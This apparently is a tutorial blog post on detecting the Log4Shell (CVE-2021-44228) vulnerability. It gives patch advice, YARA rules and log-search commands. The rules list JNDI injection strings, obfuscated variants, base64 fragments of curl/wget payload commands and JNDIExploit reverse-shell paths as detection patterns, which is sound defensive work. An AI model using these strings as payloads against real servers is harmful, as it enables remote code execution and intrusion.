<tutorialjinni.com/>

Log4Shell YARA IOC

Posted Under: IOCs, Log4j, PowerShell, Shell, Snort, Tutorials, YARA on Dec 11, 2021
Log4Shell YARA IOC
Log4Shell is an Remote Code Execution (RCE) vulnerability (CVE-2021-44228) in one of the most used enterprise Logging product Apache Log4j. Its affecting Apache Log4j versions 2.0 through 2.14.1. Apache has released and emergency patch to address the issue. The best mitigation against this vulnerability is to patch log4j to 2.15.0 and above, in Log4j version (>=2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath. Additionally, if the server has Java runtimes >= 8u121, then by default, the settings com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are set to false, mitigating this risk. However, enabling these system property requires access to the vulnerable servers as well as a restart.

Download Log4j Log4Shell Vulnerability Scanner to detect Vulnerable hosts.

In the mean time YARA rules can be deployed at IDS/IPS level to mitigate it.

Log4Shell YARA Rules

rule EXPL_Log4j_CVE_2021_44228_JAVA_Exception_Dec21_1 {
   meta:
      description = "Detects exceptions found in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"
      date = "2021-12-12"
      score = 60
   strings:
      $xa1 = "header with value of BadAttributeValueException: "
      
      $sa1 = ".log4j.core.net.JndiManager.lookup(JndiManager"
      $sa2 = "Error looking up JNDI resource"
   condition:
      $xa1 or all of ($sa*)
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
   meta:
      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      modified = "2021-12-12"
      score = 60
   strings:
      $x1 = "${jndi:ldap:/"
      $x2 = "${jndi:rmi:/"
      $x3 = "${jndi:ldaps:/"
      $x4 = "${jndi:dns:/"
      $x5 = "${jndi:iiop:/"
      $x6 = "${jndi:http:/"
      $x7 = "${jndi:nis:/"
   condition:
      1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_OBFUSC {
   meta:
      description = "Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-12"
      score = 60
   strings:
      $x1 = "$%7Bjndi:"
      $x2 = "%2524%257Bjndi"
      $x3 = "%2F%252524%25257Bjndi%3A"
      $x4 = "${jndi:${lower:"
      $x5 = "${::-j}${"
   condition:
      1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
   meta:
      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      modified = "2021-12-12"
      score = 80
   strings:
      $x1 = /∖$∖{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis):∖/[∖/]?[a-z-∖.0-9]{3,120}:[0-9]{2,5}∖/[a-zA-Z∖.]{1,32}∖}/
      $fp1r = /(ldap|rmi|ldaps|dns):∖/[∖/]?(127∖.0∖.0∖.1|192∖.168∖.|172∖.[1-3][0-9]∖.|10∖.)/
   condition:
      $x1 and not 1 of ($fp*)
}

rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
   meta:
      description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/Reelix/status/1469327487243071493"
      date = "2021-12-10"
      score = 70
   strings:
      /* curl -s  */
      $sa1 = "Y3VybCAtcy"
      $sa2 = "N1cmwgLXMg"
      $sa3 = "jdXJsIC1zI"
      /* |wget -q -O-  */
      $sb1 = "fHdnZXQgLXEgLU8tI"
      $sb2 = "x3Z2V0IC1xIC1PLS"
      $sb3 = "8d2dldCAtcSAtTy0g"
   condition:
      1 of ($sa*) and 1 of ($sb*)
}

rule SUSP_JDNIExploit_Indicators_Dec21 {
   meta:
      description = "Detects indicators of JDNI usage in log files and other payloads"
      author = "Florian Roth"
      reference = "https://github.com/flypig5211/JNDIExploit"
      date = "2021-12-10"
      modified = "2021-12-12"
      score = 70
   strings:
      $xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis):∖/∖/[a-zA-Z0-9∖.]{7,80}:[0-9]{2,5}∖/(Basic∖/Command∖/Base64|Basic∖/ReverseShell|Basic∖/TomcatMemshell|Basic∖/JBossMemshell|Basic∖/WebsphereMemshell|Basic∖/SpringMemshell|Basic∖/Command|Deserialization∖/CommonsCollectionsK|Deserialization∖/CommonsBeanutils|Deserialization∖/Jre8u20∖/TomcatMemshell|Deserialization∖/CVE_2020_2555∖/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)∖//
   condition:
      filesize < 100MB and $xr1
}

rule SUSP_EXPL_OBFUSC_Dec21_1{
   meta:
      description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/testanull/status/1469549425521348609"
      date = "2021-12-11"
      score = 60
   strings:
      /* ${lower:X} - single character match */
      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
      /* ${upper:X} - single character match */
      $ = { 24 7B 75 70 70 65 72 3A ?? 7D }
      /* URL encoded lower - obfuscation in URL */
      $ = "$%7blower:"
      $ = "$%7bupper:"
      $ = "%24%7bjndi:"
      $ = "$%7Blower:"
      $ = "$%7Bupper:"
      $ = "%24%7Bjndi:"
   condition:
      1 of them
}

Download Log4Shell YARA Rules

Download All YARA rules for Log4Shell exploit
Log4Shell YARA Rules

Log4Shell Snort Rules

Snort and Suricata prevention rules to mitigate Log4Shell threat.
Log4Shell Snort Rules

Log4Shell Detection in Log Files

If you want to investigate exploitation attempts in log try these commands. This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders.
sudo egrep -i -r '∖$∖{jndi:(ldap[s]?|rmi|dns):/[^∖n]+' /var/log
This command searches for exploitation attempts in compressed files in folder /var/log and all sub folders
sudo find /var/log -name ∖*.gz -print0 | xargs -0 zgrep -E -i '∖$∖{jndi:(ldap[s]?|rmi|dns):/[^∖n]+'
To find occurences of breach in a Windows based system, run this command in PowerShell
gci 'C:∖' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path



imgae